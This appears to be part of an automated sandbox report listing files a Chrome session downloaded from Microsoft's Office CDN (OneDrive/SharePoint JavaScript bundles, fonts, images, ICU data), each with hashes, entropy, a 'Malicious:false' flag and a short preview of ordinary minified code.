                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[288],{2239:function(e,t,n){n.r(t),n.d(t,{FloodgateDataSource:function(){return ne},resourceKey:function(){return ae}});var a={};n.r(a),n.d(a,{AllPhotosFPSSurvey:function(){return F},FPSCampaignForDocLib:function(){return h},FPSCampaignForDocLibDebug:function(){return b},NPSCampaignDebugForSPO:function(){return k},NPSCampaignDebugForSPOSharedialog:function(){return M},NPSCampaignDogfood:function(){return O},NPSCampaignForLists:function(){return p.b},NPSCampaignForListsDebug:function(){return p.a},NPSCampaignForSPO:function(){return P},NPSCampaignForSPOSharedialog:function(){return T},NPSCampaignForceNomination:function(){return w},NPSCampaignODCPaywall:function(){return x},NPSCampaignProd:function(){return C},NPSSuiteSurvey:function(){return U},NlqsSurveyForBigLangs:function(){return j},NlqsSurveyForMediumLangs:function(){return V},NlqsSurveyForSmallLangs:function(){return G},ODBCopyFPSSurvey:function(){return
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Unicode text, UTF-8 text, with very long lines (21268)
                                                          Category:downloaded
                                                          Size (bytes):531201
                                                          Entropy (8bit):5.370883401604454
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:6E439439FD62FA37D0E5B2712A208722
                                                          SHA1:078939AE119AD4BE62C24CB859B7B9D59A0D13F6
                                                          SHA-256:A9DBEA4B9C0879A400799340156130B8C057BF29848F68EAFAABCC08FADA2950
                                                          SHA-512:7BE2247012040B33FC4866DECE2ABB6A444320C96AF2B184BDCF6E692E0F372F98A64F589E730087763D04776FE78C48B55DCE698FAE23533FDC043D8000136A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/listsenterprise/105.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[105,87],{1003:(e,t,n)=>{n.d(t,{a:()=>x});var a=n("tslib_538"),i=n(35),r=n(1083),o=n(130),s=n("odsp.util_517"),c=n(51),d=n(353),l=n(1005),u=n(62),f=n(158),p=n(98),m=n(72),_="Authorization";function h(e){var t=new p.a(e);return"".concat(t.authority,"/{ length: ").concat(t.path.length,", segments: ").concat(t.segments.length," }")}var b=n(1014);function g(e){var t,n,a=null!==(n=null===(t=e.getAllResponseHeaders())||void 0===t?void 0:t.toLowerCase())&&void 0!==n?n:"";return a.indexOf("sprequestguid")>=0&&e.getResponseHeader("sprequestguid")||a.indexOf("request-id")>=0&&e.getResponseHeader("request-id")||void 0}function v(e){var t,n;return(null!==(n=null===(t=e.getAllResponseHeaders())||void 0===t?void 0:t.toLowerCase())&&void 0!==n?n:"").indexOf("ms-cv:")>=0&&e.getResponseHeader("MS-CV")||void 0}var y=!s.x9.isActivated("DA75147F-D2D8-4970-B34E-802D3E4CCE0C"),S=window&&window.performance,D={activityLimitReached:!0
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2202)
                                                          Category:downloaded
                                                          Size (bytes):2231
                                                          Entropy (8bit):5.184538074435402
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:316F7C790878F706F0E22AE8179641A7
                                                          SHA1:D3C3FFA932931A14E119623DF9D5F26140C4F433
                                                          SHA-256:DFEA6F1FBBAC55A2F85458D9501A8D0425D27FAE8AD0D9F7E28E5BD7F11BBD42
                                                          SHA-512:DA8249E030D9DB44ABF00C59803F08A0AB4DF35743C4E5D45E3F03737877E0946EF3ABAD57212B8886D017C5F866E3F5AD039FE90BC9BD277F8B53BF77C80E1B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp.fluentui.legacy.customizable/fui.lcu-5a3bba68.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["fui.lcu"],{"fui.lcu_36":(e,t,n)=>{n.d(t,{bu:()=>s,Dn:()=>c,Xk:()=>d,xv:()=>o});var a=n("tslib_538"),i=n("react-lib"),r=n("fui.util_175");function o(e,t){for(var n in e)e.hasOwnProperty(n)&&(t[n]=e[n]);return t}var s=i.createContext({customizations:{inCustomizerContext:!1,settings:{},scopedSettings:{}}});function c(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];if(e&&1===e.length&&e[0]&&!e[0].subComponentStyles)return e[0];for(var n={},i={},r=0,o=e;r<o.length;r++){var s=o[r];if(s)for(var d in s)if(s.hasOwnProperty(d)){if("subComponentStyles"===d&&void 0!==s.subComponentStyles){var l=s.subComponentStyles;for(var u in l)l.hasOwnProperty(u)&&(i.hasOwnProperty(u)?i[u].push(l[u]):i[u]=[l[u]]);continue}var f=n[d],p=s[d];n[d]=void 0===f?p:(0,a.lt)((0,a.lt)([],Array.isArray(f)?f:[f],!0),Array.isArray(p)?p:[p],!0)}}if(Object.keys(i).length>0){n.subComponentStyles={};var m=n.subComponentStyles,_=function(e
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):31474
                                                          Entropy (8bit):5.172036401879848
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:3745B759FFF6BFADFAAEED5FA228809B
                                                          SHA1:7586138A028B0CF5CBC017759F251B6E4B89C7F4
                                                          SHA-256:2D992DCD46C17E376CBC546387AA3CB3332A94DCD0EF66779240ED3AB6D9C630
                                                          SHA-512:9A51EABDFAB4B28B1F0B61A3311693CF41DFA9559D07BF4BB27FB73C7F0A2192A916C8E43B13E03BEF8D49C2849EF774A3C630A4AF48A86578C7DF996285E9A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{"Architecture":1,"Audience":1,"Resources":{"Version":"1.20241108.4.0","CatalogXml":"<ResourceCatalog>\r\n <Resources>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-752c40612c7ae9c6bc50_node_modules_mecontrol_flue-eed709\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-752c40612c7ae9c6bc50_node_modules_mecontrol_flue-eed709.9c49c3b9a807c3062050.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-752c40612c7ae9c6bc50_node_modules_mecontrol_flue-eed709.9c49c3b9a807c3062050.js</LTRPath>\r\n </Resource>\r\n <Resource Key=\"_store_mecontrol-fluent-web_3_28_4-preview_4-752c40612c7ae9c6bc50_node_modules_mecontrol_flue-f96c6c\" Type=\"LTRRTLPath\">\r\n <RTLPath>suiteux.shell._store_mecontrol-fluent-web_3_28_4-preview_4-752c40612c7ae9c6bc50_node_modules_mecontrol_flue-f96c6c.cae63b6a21efa81bff10.rtl.js</RTLPath>\r\n <LTRPath>suiteux.shell._store_mecontrol-fluent-we
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65457)
                                                          Category:downloaded
                                                          Size (bytes):154713
                                                          Entropy (8bit):5.332973310028247
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:11F13DE1D0310622A43462C48A383A3A
                                                          SHA1:84A40174D4126BDA6CB88F5FBD2ACCAA9DBD37EB
                                                          SHA-256:33BFA43EE3577D20D86D2AD977A50F85C6AEDC6AE4EE558768B45ABC8847D3E8
                                                          SHA-512:A57F89CA10BA3C2F4A54D9572C19E0AC6DDEA287B2212AA1CD00D3BC14C469241D4E9075C3DFCEAA27A9E1806C6BFDC78B77EE1BA51B72AF81801EB9E12F89CF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp.1ds/odsp.1ds.lib-1a3ee19c.js
                                                          Preview:/*! For license information please see odsp.1ds.lib-1a3ee19c.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.1ds.lib"],{"1ds-lib":function(e,t,n){n.r(t),n.d(t,{_DebugPlugin:function(){return xc},_InMemoryPropertyStorage:function(){return Pc},_OneDSLogger:function(){return Mc},_ScrubDataPlugin:function(){return Ic},_StrictContextPlugin:function(){return wc},_StringifyDataPlugin:function(){return Gs},_getDefaultScrubberConfig:function(){return Ec}});var a={};n.r(a),n.d(a,{optionalDiagnostic:function(){return Us},requiredDiagnostic:function(){return Ts},requiredService:function(){return Fs}});var i=function(e,t){return i=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},i(e,t)};function r(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");functi
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (25925)
                                                          Category:downloaded
                                                          Size (bytes):29347
                                                          Entropy (8bit):5.283374329640415
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B951EEC2E82A4927D0FFDF653A765990
                                                          SHA1:29B85EDCB896EFF41105C385FB7CAF8B438EA825
                                                          SHA-256:425A51146AF2815CD459CFA7EF4A49ABFD7340E19484A47E82712C22DF0212E6
                                                          SHA-512:047C4C8482CE4DDEF625806F0766E2C2251A885C41925C835FCEC80C04D5FBF066FC21F54CD3F2CE4CECC81F370AF50B131F9BCC4EAF0520EAB2FBE7699F8A6B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/1791.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[1791],{502027:(e,t,n)=>{n.d(t,{Z:()=>m});var a=n(539155);function i(e,t){if(!e)return;const n=e;n._virtual||(n._virtual={}),n._virtual.parent=t}var r=n(748473),o=n(734157);const s=a.createContext(void 0);s.Provider;var c=n(563849),d=n(288820),l=n(612941);const u=(0,n(695799).X)({root:{qhf8xq:"f1euv43f",Bhzewxz:"f15twtuk",oyh7mz:["f1vgc2s3","f1e31b4d"],j35jbq:["f1e31b4d","f1vgc2s3"],Bj3rh1h:"f494woh"}},{d:[".f1euv43f{position:absolute;}",".f15twtuk{top:0;}",".f1vgc2s3{left:0;}",".f1e31b4d{right:0;}",".f494woh{z-index:1000000;}"]}),f=a.useInsertionEffect;var p=n(69514);const m=e=>{return t=(e=>{const{element:t,className:n}=function(e){return(0,r.s)(e)?{element:e}:"object"==typeof e?null===e?{element:null}:e:{}}(e.mountNode),p=a.useRef(null),m=(e=>{const{targetDocument:t,dir:n}=(0,o.Y)(),i=a.useContext(s),r=(0,l.Y)(),p=u(),m=(0,c.q)(),_=(0,d.z)(m,p.root,e.className),h=null!=i?i:null==t?void 0:t
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format, TrueType, length 15620, version 1.3277
                                                          Category:downloaded
                                                          Size (bytes):15620
                                                          Entropy (8bit):7.977072668407957
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:13CAD08522692478254587EB15D731AB
                                                          SHA1:3853A2216149DF4585C6A7D85FAF0E41E3EFCF7E
                                                          SHA-256:4E22396EA0929D74DB59A60485B657DE91A28501068BCF6FB0D63D73FA40C826
                                                          SHA-512:24936F68B177B74168CC88BED57B64359FB80BF6135690B1D3BE12207AAF3683E12133F872E0053CEDAB7825B9D3565C1450D0D90C0270521088C612AC6ADF43
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/fluenthybridfont/odsp-next-icons-16-da681b0c.woff
                                                          Preview:wOFF......=.......qp........................OS/2.......G...`;.r.cmap...P.......b).!.gasp...@............glyf...L..5c..b\.Ns]head..7....5...6#.hhea..7........$....hmtx..8....a........loca..8h...........Vmaxp..94....... .w..name..9L.......O..R.post..<........ ....x.c`a..8...........L..t.!.I.(......@9......VP`p.<.K/...!...X <....RX...x...=K.a....`&..H.6!q...p.!.....]..>AD{_ ..h.h. ....V`4.9K/...o......r..p.,a...m...........,i...y.S..W..-.x..6..'...7~.K...JiXi.)...5...T..u.Ef].9/.v.O{..>.......l...k.Q.M.c#..v....PG..XF.KX...(b.S..?..9dCg..o#.Q.C..|...........r.U.............x..|y|...U..kFskNM.).4#iF.....%..-..a.....L.L8l.;.&..&Y.!.B.!$0Y !!$../!.....$.....[.....HvL..?~..............."...v/......:.......'...............*.:..(.'B.#...k..../.e,...LF.......`.$Y..I.G..F.rn.G.............4..,.h+S..&Zi...B..l..j............Wo...X.M..,......a..]xr..;..Kuy%...vS-[@M.yz......|nsSs...b.+..t..w..........+..V.E../Z_...F.NC3:...|ue.*J..7xmu6s...|..4T...\.9..kP..1d.&
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):4199
                                                          Entropy (8bit):4.6320005497594545
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:2438CDD6F5BB7731069306C5AC6B00BF
                                                          SHA1:5C70B99ABCAE66BBA4A451CC73B707C4AA049331
                                                          SHA-256:FE549E1311EE1ABC130CD94FB27FDC7BF29134160E8B103C75A741A352C6EC55
                                                          SHA-512:4E120BEE7260192F692B60EBC3A57363EFA0F0BF4F5EF03BCCC3A0DA0161056547A1A2AA130568C188D72CF63EDB1FCFD0DFA1E0587EBF3BC06D842304267A6D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/error/error_shared.svg
                                                          Preview:<svg width="160" height="160" viewBox="0 0 160 160" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_1003_114986)">..<path d="M139.501 59.1L105.201 93.7C103.201 95.7 104.101 99.2 106.901 99.9L154.001 112.4C156.801 113.1 159.301 110.6 158.601 107.8L145.801 60.8C144.901 58 141.501 57 139.501 59.1Z" fill="url(#paint0_linear_1003_114986)"/>..<path d="M39.6999 19.9L19.2999 64.2C18.0999 66.8 20.1999 69.7 22.9999 69.5L71.4999 65C74.3999 64.7 75.8999 61.5 74.1999 59.1L46.0999 19.3C44.3999 16.9 40.8999 17.3 39.6999 19.9Z" fill="url(#paint1_linear_1003_114986)"/>..<path d="M78.5007 26.1L19.6007 113.4C16.1007 118.5 19.5007 125.5 25.7007 126L130.801 133.4C137.001 133.8 141.301 127.4 138.601 121.8L92.4007 27.1C89.7007 21.5 82.0007 21 78.5007 26.1Z" fill="#FFD590"/>..<path d="M80.5012 97.1C78.3012 96.9 76.6012 95 76.8012 92.8L79.7011 51.9C79.9011 49.7 81.8012 48 84.0012 48.2C86.2012 48.4 87.9011 50.3 87.7011 52.5L84.8012 93.4C84.6012 95.6 82.7012 97.2 80.5012 97.1Z" fill="wh
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (59425)
                                                          Category:dropped
                                                          Size (bytes):64758
                                                          Entropy (8bit):5.27301523819275
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5238C6C5C1CBD7F3EB1095E46AD72D30
                                                          SHA1:DAD44C1B0E5F936A92771EFD231A20D0D9C79D41
                                                          SHA-256:73AF98C00BFBC6937101E8E207DCDD7F7564FAB05F844FBE31011C9913B17284
                                                          SHA-512:BEA24037905D288064C85922CF2D347C4174BD7AC85A49BB3D997284B7D9D0F56CC0BA723D2C56EB40A304A6210F67042432F9F353E024C01D13514DAA13158B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*! For license information please see odsp.knockout.lib-447adea9.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.knockout.lib"],{"knockout-projections-lib":function(e,t,n){var a,i,r;!function(o){"use strict";function s(e,t,n,a,i,r,o){this.inputItem=t,this.stateArrayIndex=n,this.mappingOptions=i,this.arrayOfState=r,this.outputObservableArray=o,this.outputArray=this.outputObservableArray.peek(),this.isIncluded=null,this.suppressNotification=!1,this.outputArrayIndex=e.observable(a),this.disposeFuncFromMostRecentMapping=null,this.mappedValueComputed=e.computed(this.mappingEvaluator,this),this.mappedValueComputed.subscribe(this.onMappingResultChanged,this),this.previousMappedValue=this.mappedValueComputed.peek()}function c(e,t){if(!e)return null;switch(e.status){case"added":return e.index;case"deleted":return e.index+t;default:throw new Error("Unknown diff status: "+e.status)}}function d(e,t,n,a,i,r,o,c,d){var l="number"==typeof t.moved,u=l?n[t.move
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (6936)
                                                          Category:downloaded
                                                          Size (bytes):6941
                                                          Entropy (8bit):5.359866862663699
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F90B7416B8620669D1A1DC7871A7BDB2
                                                          SHA1:CDCDD05B6BC03F7FFA0E07A44DFE9F3FC7A0A5D7
                                                          SHA-256:25A9B49AEDD78C6851325F05F25B670F3EE5D7464809961BFA2504A07590AF5F
                                                          SHA-512:7CFF08BBB82832AAF8D490562866FF8BDC1AF07A3DAC3675EA3EDAFF582EF958E1647B71DB956A03569D83862C2E7A390C2FAF58A5D2736003B52AF0D164F67F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/odblightspeedwebpack/176.js
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[176],{2267:function(e,t,n){n.r(t),n.d(t,{registerServiceWorker:function(){return S},registerServiceWorkerAtRemoteListHosts:function(){return D},shouldBypassSW:function(){return I},unregisterServiceWorker:function(){return x}});var a=n("tslib_538"),i=n(10),r=n("odsp.util_517"),o=n(9231);function s(){var e;if(!r.x9.isActivated("aa190528-cd3b-4289-9bcd-bd2f50bd489d","9/19/2023","Use Nucleus API to get target hosts.")){var t=null===(e=window._spPageContextInfo)||void 0===e?void 0:e.dataSyncClient;return null==t?void 0:t.then(function(e){return null==e?void 0:e.getSyncingSharepointDomains().then(function(e){var t;return null!==(t=null==e?void 0:e.d.results)&&void 0!==t?t:[]})})}return!r.x9.isActivated("42EE11F3-BA1E-4F0A-B6C4-7382F86A68F4","05/22/2023","Temporary, hard-coded support for x-host installation on SPDf specifically.")&&location.host.endsWith("-df.com")?Promise.resolve(["microsoft.sharepoint-df.com","mi
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (7060)
                                                          Category:dropped
                                                          Size (bytes):13474
                                                          Entropy (8bit):5.392980270738701
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:C25176CF111BC1D1D3FAFA035DAFB738
                                                          SHA1:8C6B4A5AC8C297BDF24917B1EA62A5C4484B61B2
                                                          SHA-256:4A53BC61FE6C5930210F04FF5548B1426E23C3BFF34342ECBAD138909EE03EC2
                                                          SHA-512:AB055AD1582CF20D88674FB90897A7FAE38F4F32EFC89C83BECA7053509B6CB418D9E0398C10F755F925CEBE935BE195247250C0CE0A89C79E2C85957E1D3D38
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[3],{8648:function(e,t,n){n.d(t,{a:function(){return E}});var a=n(39),i=n("tslib_538"),r=n("react-lib"),o=n(29),s=n(150),c=n(8649),d=n(4989),l=n(198),u=n(133),f=n(996),p=n("fui.util_175"),m=n(468),_=n(4988),h=(0,o.a)(),b=r.createElement(_.a,null).type,g=function(e){function t(t){var n=e.call(this,t)||this;return(0,u.a)(n),(0,f.a)("DialogContent",t,{titleId:"titleProps.id"}),n}return(0,i.e2)(t,e),t.prototype.render=function(){var e,t=this.props,n=t.showCloseButton,a=t.className,o=t.closeButtonAriaLabel,s=t.onDismiss,d=t.subTextId,l=t.subText,u=t.titleProps,f=void 0===u?{}:u,_=t.titleId,b=t.title,g=t.type,v=t.styles,y=t.theme,S=t.draggableHeaderClassName,D=h(v,{theme:y,className:a,isLargeHeader:g===c.a.largeHeader,isClose:g===c.a.close,draggableHeaderClassName:S}),I=this._groupChildren();return l&&(e=r.createElement("p",{className:D.subText,id:d},l)),r.createElement("div",{className:D.content},r.createElement("d
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):817232
                                                          Entropy (8bit):6.521575466055739
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:DA48E432FE61F451154F0715B2A7B174
                                                          SHA1:51B6ADD0BBC4E0B5200B01DECA5D009F1DAF9F39
                                                          SHA-256:65EA729083128DFCE1C00726BA932B91AAAF5E48736B5644DD37478E5F2875AC
                                                          SHA-512:5AF9C1E43B52536272A575CA400A9EEE830A8FCECB83BB1A490515851BEF48957D8DE669B9F77B8614EB586838AF23385E1AFCE622EDB82A90EC7549F882D381
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .................................p...........9... W..Y.......|...................P................]......@...........?....A..S...`A..g....A..............P.......0".......W..icudt73l/brkitr/burmesedict.dict.icudt73l/brkitr/char.brk.icudt73l/brkitr/ja.res.icudt73l/brkitr/khmerdict.dict.icudt73l/brkitr/laodict.dict.icudt73l/brkitr/line_normal.brk.icudt73l/brkitr/line_normal_cj.brk.icudt73l/brkitr/res_index.res.icudt73l/brkitr/root.res.icudt73l/brkitr/thaidict.dict.icudt73l/brkitr/word.brk.icudt73l/brkitr/word_ja.brk.icudt73l/cnvalias.icu.icudt73l/curr/supplementalData.res.icudt73l/icustd.res.icudt73l/icuver.res.icudt73l/likelySubtags.res.icudt73l/nfkc.nrm.icudt73l/uemoji.icu.icudt73l/ulayout.icu.icudt73l/zone/tzdbNames.res...........'........Dict........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unic
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):72
                                                          Entropy (8bit):4.241202481433726
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:9E576E34B18E986347909C29AE6A82C6
                                                          SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                          SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                          SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (4078)
                                                          Category:downloaded
                                                          Size (bytes):7191
                                                          Entropy (8bit):5.133918869608143
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:94778FCA478DA3DEA68E0FF58625209A
                                                          SHA1:903FCB01B8930208293E5182629EC7A6777A4879
                                                          SHA-256:B33121E0EC9C950BB021F1526A56943C1327AAA2255FF6700FDC17D13B2A5A2D
                                                          SHA-512:5DFE873871036422DDDACE92FA572F1ED76ED08E3F0DAC9F8BE31FEDBFF909A3B2BAABBC81E355B86BE8B27E2C983DF9A0E4E80122C9F76BAE8D5BB6016E7B13
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/24997.js
                                                          Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[24997],{150516:(e,t,n)=>{n.d(t,{V:()=>r});var a=n(171125),i=new Map;function r(e,t,n){var r=void 0!==n?n:{};return i.forEach(function(n,i){var o;(void 0===n.precond||n.precond(e,t))&&(r instanceof Headers?r.has(i)||r.set(i,n.value):void 0!==r&&(i in r||(r=(0,a.__assign)((0,a.__assign)({},r),((o={})[i]=n.value,o)))))}),r}}.,599533:(e,t,n)=>{var a;function i(e,t,n,i){n=n||{},i=i||{};var r=[e,t].filter(function(e){return e.length}).join("/"),o={id:"",apiVersion:""},s=r.replace(/:(\w+?)(\W|$)/g,function(e,t,r){if(!n[t])return""+r;var s=n[t];return"string"==typeof s&&"@"===s[0]&&(s=a.lookupDottedPath(i||{},s.substring(1))),"function"==typeof s&&(s=s()),o[t]=s,s+r}),c={};Object.keys(n).forEach(function(e){if(!o[e]){var t=n[e];c[e]="function"==typeof t?t():t}}),s=s.split("://").map(function(e){return e.replace(/[\/]{2,}/g,"/")}).join("://"),s=a.encodeUri(s);var d=a.getQueryString(c);return d&&(s=s+
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:RIFF (little-endian) data, Web/P image
                                                          Category:downloaded
                                                          Size (bytes):42254
                                                          Entropy (8bit):7.963064331425086
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:60AF105AB6B630452B06D6DDA4B0BE74
                                                          SHA1:920F5FC2CA2058928738C1695504B23704C794A9
                                                          SHA-256:3FC627E56349201333E6C39A44036B5CF09AD9378E46782098505EDB037BA104
                                                          SHA-512:7A8B15D66D4D3D65037170599BF6C961FEA777F1D74685852AB8E18D9402145E1271561EB1AA7E9CB403A01C72BD195BB97F4EBABA1610D5A15942B57780357D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/sp-client/odsp-media-779eb0fe/images/emptyfolder/empty_filter_v3.webp
                                                          Preview:RIFF....WEBPVP8X..............ALPHy|.....m.HI........g..ef.v.2....I.J..!L..Nx.u....r_=|T.%I.j.m..>....L...4...kM..>jm}.u.m..."b.....mm[...}..f.".,9M{.5.r,.G._....Y........E..0..9.........$K;..d.....X.L..?....bJ...p2..>...ydUe..aDL...................x.K.B...k..i...n..oJc..d..-_m4-..~f..e...!&&.s.~..i.}.y=b...i..e..\..k...v.......lyl..Nf..5/...b.W_nZ.{.{..@f...i.m..e^....<f..%..1k.5............9&.sh.o...Zs_L...Zk..n......c7!V.. ..I.H&...L.Q0.@.s.a...0`...MA0.L..&..rc.<lB..q9..e..X`0..3..a..;^.,....iH.r.w.K....f.Xf........L..@B..... N...$y...E..,....W>..&...@.0.......$)I..!s.........W<....b$.\6$..........[.e....Q....rc.$.0...H.!yP..!5L.'H.2....M.1D..'.....`H.....`...*!...6! ..a,#.X......_.dY...4..$..0LB....(....&F.X..,...YlI..&.E..] A ..xPH..0..K..V..|....-#..h..,+.6..5H..@ A..v%.....$DB.A...U..... .k.,#.In.!.$..jv.`.{.>..Sa..). 2b....`..A.._.dYF..qQ.0...l..9..v....i0.c.c........q/.AC#,dY.aY..,..[...K.......@.d.s....\......xs:.W=-..x,..W....0......`..
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (10451)
                                                          Category:dropped
                                                          Size (bytes):15727
                                                          Entropy (8bit):5.2402035075773705
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5534A7CC04D8B53FDB821B6956D2E212
                                                          SHA1:7FADE20069D3AC82FE0563934ED38EF687A9B27D
                                                          SHA-256:FA1FDC2E4360885A6CB4057B06C176A1744FCA6EBB602573F2C1E5F7B9C12705
                                                          SHA-512:97D83D9548C7C899086063C778710C42E417675B5930EFD45C45BF339C141B5A8E2C8D6F9D8F4A585973CC25ED70ACF9C3DFDF264CA1EB25F50D554290A5A446
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[6],{8905:function(e,t,n){n.d(t,{a:function(){return D}});var a,i=n(39),r=n("tslib_538"),o=n("react-lib"),s=n(2597),c=n(82),d=n(29),l=n(133),u=n("fui.util_175"),f=n(150),p=n(1048),m=n(49),_=n(2626),h=(0,d.a)(),b="TextField",g=function(e){function t(t){var n=e.call(this,t)||this;n._textElement=o.createRef(),n._onFocus=function(e){n.props.onFocus&&n.props.onFocus(e),n.setState({isFocused:!0},function(){n.props.validateOnFocusIn&&n._validate(n.value)})},n._onBlur=function(e){n.props.onBlur&&n.props.onBlur(e),n.setState({isFocused:!1},function(){n.props.validateOnFocusOut&&n._validate(n.value)})},n._onRenderLabel=function(e){var t=e.label,a=e.required,i=n._classNames.subComponentStyles?n._classNames.subComponentStyles.label:void 0;return t?o.createElement(s.a,{required:a,htmlFor:n._id,styles:i,disabled:e.disabled,id:n._labelId},e.label):null},n._onRenderDescription=function(e){return e.description?o.createElement(
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Java source, ASCII text, with very long lines (23457)
                                                          Category:downloaded
                                                          Size (bytes):103664
                                                          Entropy (8bit):5.437084642073178
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5C99081CDEE114F6F98231096E0503D4
                                                          SHA1:6CA12ACBCD216F2E0C80EFDE91B5294FCFA01013
                                                          SHA-256:292B9446ED2FFA252A62BC8027068B5D61441F82A9C8BC90A5A96D346425096C
                                                          SHA-512:C882138280E597D0502B246C7FC03FDD796EC928BDA0DB54015F95DCC35FA521107FD8D906ED0046007FEF28F67F3AE625B90F4093484A83D6B526B549EAE77D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-11-01.006/@ms/stream-bundle/chunks/29255.js
